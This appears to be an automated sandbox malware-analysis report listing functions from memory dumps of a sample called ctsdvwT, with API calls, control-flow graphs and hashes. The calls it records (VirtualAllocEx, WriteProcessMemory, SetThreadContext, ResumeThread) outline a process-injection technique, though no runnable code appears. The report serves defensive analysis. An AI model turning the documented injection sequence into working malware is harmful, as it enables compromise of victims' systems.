                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 015859C9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: f23009a9cf4a9af4f8d1d47b23ea7e9c7c339122117cc4ab68ffaa4a45b2a4a4
                                • Instruction ID: fb11387b1bc554c69610fde813bc9c4af596c4751373d32dfbe2797d2b5b49e1
                                • Opcode Fuzzy Hash: f23009a9cf4a9af4f8d1d47b23ea7e9c7c339122117cc4ab68ffaa4a45b2a4a4
                                • Instruction Fuzzy Hash: 6F41D1B1C11718CFDB24DFAAC884B9EBBF5BF49304F20816AD418AB251DBB56985CF50
                                Function 066F6360 Relevance: 1.6, APIs: 1, Instructions: 89memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 343 66f6360-66f6364 344 66f62f7-66f6333 343->344 345 66f6366-66f63e3 VirtualAllocEx 343->345 348 66f633d 344->348 349 66f6335-66f633b 344->349 355 66f63ec-66f6411 345->355 356 66f63e5-66f63eb 345->356 350 66f6340-66f6355 348->350 349->350 356->355
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066F63D6
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 7b14384e621b68f25cdece042ac9fdc92f58bdc3278084acd5b5e944653316e0
                                • Instruction ID: 4a69f5f1b2ac3c6c7473e5618ca6af7e68710bd9314b82ff30c509ad070acfc1
                                • Opcode Fuzzy Hash: 7b14384e621b68f25cdece042ac9fdc92f58bdc3278084acd5b5e944653316e0
                                • Instruction Fuzzy Hash: 43313575A002499FDB10DFA9D845BEEFBF5FF48324F248029EA15AB250C775A940CFA0
                                Function 066F6421 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 360 66f6421-66f6476 362 66f6478-66f6484 360->362 363 66f6486-66f64c5 WriteProcessMemory 360->363 362->363 365 66f64ce-66f64fe 363->365 366 66f64c7-66f64cd 363->366 366->365
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066F64B8
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: fbc772ece19aebe2a1e5963dd9be91d414b73bf5243f150f4c40d7a2ff2a10bf
                                • Instruction ID: 7db904b764dcabccf704398a087dcf8d89fd2b52487faaa5c6ca7a7dbf87c895
                                • Opcode Fuzzy Hash: fbc772ece19aebe2a1e5963dd9be91d414b73bf5243f150f4c40d7a2ff2a10bf
                                • Instruction Fuzzy Hash: 252164B19003499FDB40CFAAC881BEEBBF1FF48310F14842AE918A7240C7789944CBA4
                                Function 066F6428 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 370 66f6428-66f6476 372 66f6478-66f6484 370->372 373 66f6486-66f64c5 WriteProcessMemory 370->373 372->373 375 66f64ce-66f64fe 373->375 376 66f64c7-66f64cd 373->376 376->375
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 066F64B8
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 59ce7110e2df26f889241164f4c093e635cd99c3297562491a8bcc35918e43ae
                                • Instruction ID: 8054234716b68878cc4ecd5d144583cf88d6088cdb50c8c2ba47097162f4d54e
                                • Opcode Fuzzy Hash: 59ce7110e2df26f889241164f4c093e635cd99c3297562491a8bcc35918e43ae
                                • Instruction Fuzzy Hash: 342144B19003099FDB40DFAAC880BEEBBF5FF48310F10842AE918A7240C7789944CBA4
                                Function 0158D2F8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 380 158d2f8-158d2fe 381 158d300 380->381 382 158d301-158d394 DuplicateHandle 380->382 381->382 383 158d39d-158d3ba 382->383 384 158d396-158d39c 382->384 384->383
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158D387
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: a87e596601658da58efe1dd583a99eff577f04226145477518ec02c92a514ae0
                                • Instruction ID: 2f51136da55dbe9cdec1df7b8fc869b618d3e838aa0caa53586a7076eedcd9b3
                                • Opcode Fuzzy Hash: a87e596601658da58efe1dd583a99eff577f04226145477518ec02c92a514ae0
                                • Instruction Fuzzy Hash: 302105B59002089FDF10CF9AD885AEEBBF5FB48310F14841AE954A7351C374A941CFA5
                                Function 066F6510 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 387 66f6510-66f65a5 ReadProcessMemory 391 66f65ae-66f65de 387->391 392 66f65a7-66f65ad 387->392 392->391
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066F6598
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 6006355632782ef8a08294aec345b389cdf307874fd63d46cf00aae17b7c9865
                                • Instruction ID: a27dc547d40948bcee7548c47ad71ecdde994eb03ab69faf6d7aace701d6ccd1
                                • Opcode Fuzzy Hash: 6006355632782ef8a08294aec345b389cdf307874fd63d46cf00aae17b7c9865
                                • Instruction Fuzzy Hash: 6D2136B18003599FDB10DFAAC840BEEBBF5FF48314F548429E919A7241C774A940CBA4
                                Function 066F5E58 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                Download Yara Rule
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 066F5ED6
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: dea5067bb9d3d76fba4cdc32523a45e22d5b5752d2590814a184309665855dc7
                                • Instruction ID: fadbb66f7e1f2cc3cda7cb1f4c128eb0b970367649cc1c68c7c7a5db398d4d6e
                                • Opcode Fuzzy Hash: dea5067bb9d3d76fba4cdc32523a45e22d5b5752d2590814a184309665855dc7
                                • Instruction Fuzzy Hash: 54213471D003089FDB50DFAAC4857AEBBF4EB88310F54842AD559A7241CB789944CFA4
                                Function 066F6518 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                Download Yara Rule
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 066F6598
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 203dae8ff0b641f2b935e2f4e9aab2445bedf71217b80639401eaf9e471e18b9
                                • Instruction ID: dba4d9cbecdf04229acedc2645fa6476a05d8bb658e5450577697f01e17855db
                                • Opcode Fuzzy Hash: 203dae8ff0b641f2b935e2f4e9aab2445bedf71217b80639401eaf9e471e18b9
                                • Instruction Fuzzy Hash: 292125B18003499FDF10DFAAC880BEEBBF5FF48310F54842AE958A7241C7789940CBA4
                                Function 0158D300 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0158D387
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 028c5946abbd4ec1bb9824b9aea952845bb969b1ccd07ce26e9cbad64b8825fa
                                • Instruction ID: ed752adf9077ab8734f13bc6c3ae3e2fa31ef5cb5d7611c5b854007576c9270d
                                • Opcode Fuzzy Hash: 028c5946abbd4ec1bb9824b9aea952845bb969b1ccd07ce26e9cbad64b8825fa
                                • Instruction Fuzzy Hash: 3A21C4B59002489FDB10CF9AD484ADEBBF5FB48310F14842AE958A7351D374A954CFA5
                                Function 0158A870 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0158B101,00000800,00000000,00000000), ref: 0158B312
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: d18e0e89ad16374ca88dbec2d7d5ab8fbb5429d4422f96da79096f2b9561bc38
                                • Instruction ID: 56f37b45d9e86f2140246ebed4691113f63b75dd779ea8585133fa7b5cba0980
                                • Opcode Fuzzy Hash: d18e0e89ad16374ca88dbec2d7d5ab8fbb5429d4422f96da79096f2b9561bc38
                                • Instruction Fuzzy Hash: 4F1100B69003498FDB10DF9AD444AAEFBF8FB88310F14842AE919BB201C375A545CFA4
                                Function 0158B2A1 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0158B101,00000800,00000000,00000000), ref: 0158B312
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: LibraryLoad
                                • String ID:
                                • API String ID: 1029625771-0
                                • Opcode ID: 3554ea6a2042da4ebf723cbf2e2adf7b24cb123cf0bf3d3a6c639bf526389707
                                • Instruction ID: 77e890da60fda92adf86f401316e3c95712d367e7eb6059f29b67a893c2d80a9
                                • Opcode Fuzzy Hash: 3554ea6a2042da4ebf723cbf2e2adf7b24cb123cf0bf3d3a6c639bf526389707
                                • Instruction Fuzzy Hash: 3D1114B68003498FDB10DFAAC444ADEFBF4FB88310F14842AE959B7211C375A545CFA5
                                Function 066F6368 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 066F63D6
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 9ae9bd63273d53eb7df5267bd2f3bebd16c2046cbdd84cffb7f0eb115d8a6d7a
                                • Instruction ID: 707e9266bfcb1f30bfccb9c30902624e88ee07f2f62f3e868fa4964fa0722038
                                • Opcode Fuzzy Hash: 9ae9bd63273d53eb7df5267bd2f3bebd16c2046cbdd84cffb7f0eb115d8a6d7a
                                • Instruction Fuzzy Hash: 771137768003489FDF10DFAAC844BEEBBF5EF88310F148429E555A7250C775A944CFA4
                                Function 066F5DA0 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 5a859af894d395c54e1c288da24a339f6a1a71255e1b8daab154f8a452312910
                                • Instruction ID: a559f584e73f92b20fa9cb28dc97c3061556929e2e19b3039d383cc205a3f3bd
                                • Opcode Fuzzy Hash: 5a859af894d395c54e1c288da24a339f6a1a71255e1b8daab154f8a452312910
                                • Instruction Fuzzy Hash: 2C1146B59003488FDB10DFAAC4457EEFBF5AF88314F24842AD559A7250C7755944CBA4
                                Function 066F5DA8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 5c2a5224426f8284f795f73845fe3431c27199e49842a31c23dfa0ba3e7a5d63
                                • Instruction ID: 4829a5f3aaab6db090b8ef1a3939d14928adf9b819d2ba8d9e73fef1f273aab2
                                • Opcode Fuzzy Hash: 5c2a5224426f8284f795f73845fe3431c27199e49842a31c23dfa0ba3e7a5d63
                                • Instruction Fuzzy Hash: 751136B1D003488FDB10DFAAC4457EEFBF5EF88324F24842AD559A7240CB75A944CBA4
                                Function 0158B020 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0158B086
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1485111475.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_1580000_ctsdvwT.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: f787eeb5689d483f94cb8404162207de37e31f42c4920a9499906ffdcee9f834
                                • Instruction ID: 24146be40a3c7b3fc6f06eb6bf52845155e2043b61e56d89c814af8ca07ed7a7
                                • Opcode Fuzzy Hash: f787eeb5689d483f94cb8404162207de37e31f42c4920a9499906ffdcee9f834
                                • Instruction Fuzzy Hash: A411FDB5C00749CFDB20DF9AC444B9EFBF8AB89210F10842AD968B7210C375A549CFA5
                                Function 066F9078 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 066F90DD
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 008623f275995a53b4cf65700bdf6a1042c4a6660cc18a7914a1f464ecf71648
                                • Instruction ID: 83c961d1f84571561307c5df0ea57f062c2a3bfc0fe2adaa8b3c0687dd5b9324
                                • Opcode Fuzzy Hash: 008623f275995a53b4cf65700bdf6a1042c4a6660cc18a7914a1f464ecf71648
                                • Instruction Fuzzy Hash: B81133B58007499FDB20DF9AC885BDEFBF8EB48324F20851AE558B7240C375A544CFA0
                                Function 066F9080 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                Download Yara Rule
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 066F90DD
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488906860.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_66f0000_ctsdvwT.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: cebc80277eca77946bb41770bbaf267049d426b5a7810a6304ac1784ed9d3b95
                                • Instruction ID: d38171478fa05289625d447a103acc78c64e60b1f294c61933745df2ceb6604b
                                • Opcode Fuzzy Hash: cebc80277eca77946bb41770bbaf267049d426b5a7810a6304ac1784ed9d3b95
                                • Instruction Fuzzy Hash: 1D11D3B58003499FDB50DF9AD885BDEFBF8EB48324F10841AE558A7240C375A944CFA5
                                Function 05AF7127 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: P
                                • API String ID: 0-3110715001
                                • Opcode ID: 0ef0385c0160e37f0206596fc5fac78885f1e897120a6c77f617a508704c8fc9
                                • Instruction ID: 858ebc0080215f05b26a2858778b4aa92e7d55e786bd05c92cb039039f9b44b1
                                • Opcode Fuzzy Hash: 0ef0385c0160e37f0206596fc5fac78885f1e897120a6c77f617a508704c8fc9
                                • Instruction Fuzzy Hash: 4241D171A04215CFDF14CFE8E845A7EBBF2FB85211F14416AF662EB291CB308845DB59
                                Function 05AFAE58 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID: C_fm^
                                • API String ID: 0-3546035360
                                • Opcode ID: 5480a7eb81c6071d7b1567324442d52d1bdde6a65d7cf4705776eea11e72bfed
                                • Instruction ID: e94eda73823c749bd36e2668722d92593eae152c629c674a6f29a56038d55e8f
                                • Opcode Fuzzy Hash: 5480a7eb81c6071d7b1567324442d52d1bdde6a65d7cf4705776eea11e72bfed
                                • Instruction Fuzzy Hash: 6B21D3726002018FCB14EBB8C4889DFBBE6FF84214B558969E60ADB350EF71E8058B91
                                Function 05AFA6F4 Relevance: .1, Instructions: 99COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8d0df1192519807b53f02657049519ccfaf027129fe7af5da912b460d2e8016d
                                • Instruction ID: 9a03baa7e4c81fef334158de4d6ce7fb2cd37e1adec76c5d88a68d008dbd96e0
                                • Opcode Fuzzy Hash: 8d0df1192519807b53f02657049519ccfaf027129fe7af5da912b460d2e8016d
                                • Instruction Fuzzy Hash: 9641D2B1D0030CDBDB24CFE9C984A9DBFB5BF48304F248129E919AB210D7756A4ACF94
                                Function 05AF7890 Relevance: .1, Instructions: 90COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8272312cf67dc49beadc96a4309f8990a6255001f2138f1222bd36ecd426b712
                                • Instruction ID: 7ee22811f4e7dc90ede0f4c794c52f6232eec8de7c4a95738b160f77c33dbbe4
                                • Opcode Fuzzy Hash: 8272312cf67dc49beadc96a4309f8990a6255001f2138f1222bd36ecd426b712
                                • Instruction Fuzzy Hash: 6C31E674E142199FCB04CFEAD8459EEBBF2FB88300F108429E515A7214DB355A41CF94
                                Function 05AF7881 Relevance: .1, Instructions: 89COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a6e464ece5292554170b1c0fa158a68ef68d3378e0095e145f45667e48db07e7
                                • Instruction ID: 746c254e6f8976e94a907d110467a28c4a08c83b92fbeaff79dbdc8d9dd27f97
                                • Opcode Fuzzy Hash: a6e464ece5292554170b1c0fa158a68ef68d3378e0095e145f45667e48db07e7
                                • Instruction Fuzzy Hash: 92310774E142199FCB04CFAAE8459EEFBB2FB88301F14C42AE511A7354DB349A41CF94
                                Function 05AF555C Relevance: .1, Instructions: 84COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bf79a43a714a3191a7d012d7a343543e169e6adefca529355a75b82518a3d61d
                                • Instruction ID: d742419e844ba81a64591aa2c38beadd88d32d4d867ec305a8a80b0f35986a13
                                • Opcode Fuzzy Hash: bf79a43a714a3191a7d012d7a343543e169e6adefca529355a75b82518a3d61d
                                • Instruction Fuzzy Hash: 41215C75B003155FDB16EBB88858ABFBBBBEFC82507148929E816D7240EE348D058751
                                Function 011DD3D8 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1483979732.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11dd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 303c2f5868f348b83df08b8ebfc48feeee1a0d3fa4e29e252e380ddc20549143
                                • Instruction ID: bb2006cb17fd27ef2892acaa78af05d9bc04fca3b0548fd2c3180e1de7713b90
                                • Opcode Fuzzy Hash: 303c2f5868f348b83df08b8ebfc48feeee1a0d3fa4e29e252e380ddc20549143
                                • Instruction Fuzzy Hash: 5B2128B1504204DFDF19DF94E9C0B66BF65FB88324F20C16DD9090B696C336E456CBA2
                                Function 011DD4C4 Relevance: .1, Instructions: 75COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1483979732.00000000011DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11dd000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f15872d2f8ae15ab4bcb7eb2c31e0a1b35845f1f31874dff8b8d39270181ee06
                                • Instruction ID: 9285fb826ac76cec801856e1782d91114f81b2995c607eee3d3dc18c677a6e73
                                • Opcode Fuzzy Hash: f15872d2f8ae15ab4bcb7eb2c31e0a1b35845f1f31874dff8b8d39270181ee06
                                • Instruction Fuzzy Hash: EB212572544240DFDF19DF94E9C0B26BF75FB88318F60C569E8090B296C336D456CBA2
                                Function 05AFA934 Relevance: .1, Instructions: 73COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e37b7a7e755591af39852e6766fc4f6cbe7debb83d234ba484a4e9fdee931ed
                                • Instruction ID: 54a38188b3b357fc3559c88042eec4cb8d8b561c086b3ea7d419f49611587d81
                                • Opcode Fuzzy Hash: 8e37b7a7e755591af39852e6766fc4f6cbe7debb83d234ba484a4e9fdee931ed
                                • Instruction Fuzzy Hash: 0C212B32A082099FCB04DBA5DC54DEE7BBAEFC5220B45C47BF514EB110DB309904C790
                                Function 011ED01C Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1484050420.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11ed000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 52058cdc193c024d26d09c8a2dbed3a5ea2c3f0f5543c1cd4bfc8ef58f8ae711
                                • Instruction ID: 1ddf4dc2d43787654430a6aadd679675d47135bd942f62835d1739eef5824ded
                                • Opcode Fuzzy Hash: 52058cdc193c024d26d09c8a2dbed3a5ea2c3f0f5543c1cd4bfc8ef58f8ae711
                                • Instruction Fuzzy Hash: BB212271604700DFDF19DF94E888B26BFA1FB88314F28C56DE80A0B242C336D447CA62
                                Function 011ED1D4 Relevance: .1, Instructions: 72COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1484050420.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11ed000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 06562f248440073252ea61bbc65fc0b96485303f9c7646109e7e94e8cfd1f285
                                • Instruction ID: cae02ce5c40d95cbb7b46679e1cd43d4958a84cb3011bb1a2c30920550ef7541
                                • Opcode Fuzzy Hash: 06562f248440073252ea61bbc65fc0b96485303f9c7646109e7e94e8cfd1f285
                                • Instruction Fuzzy Hash: 8221F275504601EFDF09DFD4E9C8B26BBA5FB88324F20C56DE8494B292C336D456CA62
                                Function 05AF9F00 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1488384861.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_5af0000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3790ed8fb72fe2387f7ea50fc0dc7012ce13e8a9ec93a0806deba262dc1c3b6d
                                • Instruction ID: 07e483d5e489878ad022b635e3b64ff0ab29bd49faa2c603843ba7c6ea73adfc
                                • Opcode Fuzzy Hash: 3790ed8fb72fe2387f7ea50fc0dc7012ce13e8a9ec93a0806deba262dc1c3b6d
                                • Instruction Fuzzy Hash: 8E31E0B0C013189FDB20DFDAC584BDEBBF5BB48714F248029E508BB240C7B55845CBA4
                                Function 011ED006 Relevance: .1, Instructions: 62COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1484050420.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_11ed000_ctsdvwT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5756da73116fa542434870866c6a4fe07ff5f0d0e9bd798578c1d946cc64a628
                                • Instruction ID: bdff0d3a9219973e2fc93f914db23a71471444d14edc140aa53a3d84d4f276e6
                                • Opcode Fuzzy Hash: 5756da73116fa542434870866c6a4fe07ff5f0d0e9bd798578c1d946cc64a628
